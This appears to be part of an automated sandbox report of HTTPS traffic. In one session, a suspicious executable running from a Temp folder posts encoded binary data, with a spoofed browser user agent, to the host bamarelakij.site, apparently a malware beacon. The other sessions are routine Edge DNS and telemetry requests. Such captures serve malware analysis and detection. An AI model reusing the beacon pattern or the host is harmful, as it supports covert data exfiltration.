                                                                                                                                                                2025-01-09 13:42:23 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 90 0d 0a
                                                                                                                                                                Data Ascii: 12
                                                                                                                                                                2025-01-09 13:42:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.749975104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:23 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 208
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:23 UTC208OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 61 a6 b6 09 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 c2 4d 6d 12 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 c2 4d 6d 12 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: aG6Mm%!MmXZZ
                                                                                                                                                                2025-01-09 13:42:24 UTC815INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:24 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W57oK5h08WxrQ6PmJyZG%2F99gFH2dbkrBGMB6uHFR%2F5YQxWB%2FLb1H31Ht8PiCJrcfZUslLdjboSuXWY4LmAuG2%2FDW8iO5zKXaF7E9j2W%2BENHTK25vxCWLRO2%2BQntPrWULLBEq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4d9af0acdc411-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1686&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1279&delivery_rate=1731909&cwnd=224&unsent_bytes=0&cid=951396d830ff3136&ts=334&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.750012172.64.41.34437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:36 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 128
                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                Accept-Language: *
                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                2025-01-09 13:42:36 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                2025-01-09 13:42:36 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:36 GMT
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                Connection: close
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                CF-RAY: 8ff4d9fd0f878c63-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2025-01-09 13:42:36 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcom)P)


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.750013162.159.61.34437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:36 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 128
                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                Accept-Language: *
                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                2025-01-09 13:42:36 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                2025-01-09 13:42:36 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:36 GMT
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                Connection: close
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                CF-RAY: 8ff4d9fcfd1b41bb-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2025-01-09 13:42:36 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 18 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcomA)


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.750011162.159.61.34437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:36 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 128
                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                Accept-Language: *
                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                2025-01-09 13:42:36 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                2025-01-09 13:42:36 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:36 GMT
                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                Connection: close
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                CF-RAY: 8ff4d9fd3d0672c2-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2025-01-09 13:42:36 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: wwwgstaticcom P)


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.75002820.110.205.1194437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:38 UTC1175OUTGET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
                                                                                                                                                                2025-01-09 13:42:38 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&RedC=c.msn.com&MXFR=0E823CD872A76198161729B773BE609A
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: MUID=0E823CD872A76198161729B773BE609A; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:38 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:38 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.75002918.173.219.1114437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:38 UTC925OUTGET /b?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                2025-01-09 13:42:38 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:38 GMT
                                                                                                                                                                Location: /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                set-cookie: UID=1C82b153708d47b4ae7d1c01736430158; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                set-cookie: XID=1C82b153708d47b4ae7d1c01736430158; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                Via: 1.1 64d968aa0a0b58a1d00cb142d02b0ac0.cloudfront.net (CloudFront)
                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                X-Amz-Cf-Id: WG4dRpPps6PuqiC4TU4GWX58X3BcMul-OO7tghidP_4GYXlZxUcihg==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.75002740.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:38 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430156622&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 3856
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
                                                                                                                                                                2025-01-09 13:42:38 UTC3856OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 36 2e 36 31 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:42:36.617Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
                                                                                                                                                                2025-01-09 13:42:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=50154e19c48b4236881c2115b931d48d&HASH=5015&LV=202501&V=4&LU=1736430158946; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=5817f85e6e974b95913bae971c08cd30; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2324
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:39 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.75003818.173.219.1114437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:38 UTC1012OUTGET /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: UID=1C82b153708d47b4ae7d1c01736430158; XID=1C82b153708d47b4ae7d1c01736430158
                                                                                                                                                                2025-01-09 13:42:39 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                Connection: close
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:39 GMT
                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                Via: 1.1 078fe53d3a4b452fe5cde4b5d9596b0e.cloudfront.net (CloudFront)
                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                X-Amz-Cf-Id: 6nuSv1aU4LyTTVvv3BtiZfsPAbAhKx-hc0zt8HU843HtR4UBULSpiA==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.75005720.110.205.1194437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:39 UTC1271OUTGET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&MUID=0E823CD872A76198161729B773BE609A HTTP/1.1
                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; SM=T; _C_ETH=1
                                                                                                                                                                2025-01-09 13:42:40 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                Accept-Ranges: bytes
